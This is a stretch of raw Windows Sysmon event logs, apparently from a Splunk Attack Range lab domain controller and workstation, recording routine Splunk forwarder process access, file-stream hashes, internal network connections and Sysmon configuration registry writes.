07:55:53.601{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F589-60EB-597D-00000000CF01}8820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.601{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:53.601{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.601{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:53.601{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.601{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F589-60EB-597D-00000000CF01}8820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.586{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F589-60EB-597D-00000000CF01}8820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.587{466BC892-F589-60EB-597D-00000000CF01}8820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.102{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0551495651AF219D3AEFE85DFFC13A9,SHA256=35276B93059FC217A6E113C79CC287655F140E14BC4FF3DA62436A5589BDF133,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808211Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:54.259{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D195904756310A520FB184950C1D9FD,SHA256=3616F6431F50C71EC5447CD1EE4BA0DC8489CA094884A39F4DF9DF4298FC7D14,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:54.293{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F58A-60EB-5A7D-00000000CF01}8628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:54.293{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F58A-60EB-5A7D-00000000CF01}8628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:54.293{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:54.293{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:54.293{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:54.293{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:54.293{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F58A-60EB-5A7D-00000000CF01}8628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:54.274{466BC892-F58A-60EB-5A7D-00000000CF01}8628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
23542300x80000000000000001050237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:54.132{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C12A9DB2995F2B8371E0B2AC579409D2,SHA256=2ACDC6E8CD9B33FD05ADA97351B3C3CB2EE4F55FFCAACD8360704CEFA86524EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808212Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:55.274{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C54E8B1C9312CD7DB3C2B4DD94A8538,SHA256=6645395F67A150A6D51CB4119B251A7D16EE62EE8DD6EF7133BAE7A359E38C27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:55.288{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68E2247CE5B249B5EAA84D766C3BEAF0,SHA256=B5357A68DB270DE7219B2D2AB521223F149BE2FA3AE6AE147DAC10D892F41DC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:55.138{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D04524FF4FA91B22B928A71AD73D726D,SHA256=119BD7692E90CFE516D93F017BBCC862C1C51BCD28FE4A3C1EE190A6788E6927,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808213Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:56.324{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=902BA4932F1CA3B5CCD57401C91095A6,SHA256=3E442689CB58B1B22C89C152B385FC7CAAD931B957B5B96FACC2DF784090A2AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:56.169{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88661B3ADED811E464457BCC48E02AA7,SHA256=111AE6A1E0A97A692FC81DEF234C238DFD27025C4F35EA3EB6C9B7F5AA550CAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808215Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:57.384{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1523338FA67C336D7E923B93F6C430FD,SHA256=A6E25356ECB90C8DE93496A9D6EE5B7F0C410AFEBBD5E1E91C2FB8E7422530C4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:49.761{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51078-false10.0.1.12-8000- 23542300x80000000000000001050250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:57.186{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C98B20D2712CFF6F3CCF035788A8805,SHA256=0FB6749D65DCE0F2FBBF25F5F40111C95BA2B17CC2C4D3F4ECE51527C49F526D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808214Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:55.376{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57311-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:57.068{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808216Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:58.385{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6E241601727F6F93FDCEBB77DA71734,SHA256=1143447974927DA6639701BF6BE61E1F981116612927B82BCB50C876EFD78D20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:58.204{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63FFA5FB15B82B4DFF16CD4244339763,SHA256=E0E9905BAF8A0635E35E3B0C305992E3ABEDDC455224AC1C67B59102DEE271DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808221Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:59.682{0C1E0330-048F-60E8-0B00-00000000D001}628832C:\Windows\system32\lsass.exe{0C1E0330-048D-60E8-0100-00000000D001}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 
23542300x8000000000000000808220Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:59.401{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E85BCA7A01D079693040005D79717D0,SHA256=ED4367FC8333039F1216DF716EB523DCC0E200EE5B05BCCD997918EE00693E63,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001050274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:55:59.535{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\ConfigHashSHA256=B0C36ACDF22162AD79D07D67E63140DF7514E548DA320BC04E293C986A9BC194 13241300x80000000000000001050273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:55:59.535{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\ConfigFileC:\Program Files\ansible\AttackRangeSysmon.xml 16341600x80000000000000001050272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local2021-07-12 07:55:59.535C:\Program Files\ansible\AttackRangeSysmon.xmlSHA256=B0C36ACDF22162AD79D07D67E63140DF7514E548DA320BC04E293C986A9BC194 13241300x80000000000000001050271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:55:59.535{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\RulesBinary Data 13241300x80000000000000001050270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program 
Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\DnsLookupBinary Data 13241300x80000000000000001050269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\CheckRevocationBinary Data 13241300x80000000000000001050268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\HashingAlgorithmDWORD (0x8000000e) 13241300x80000000000000001050267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 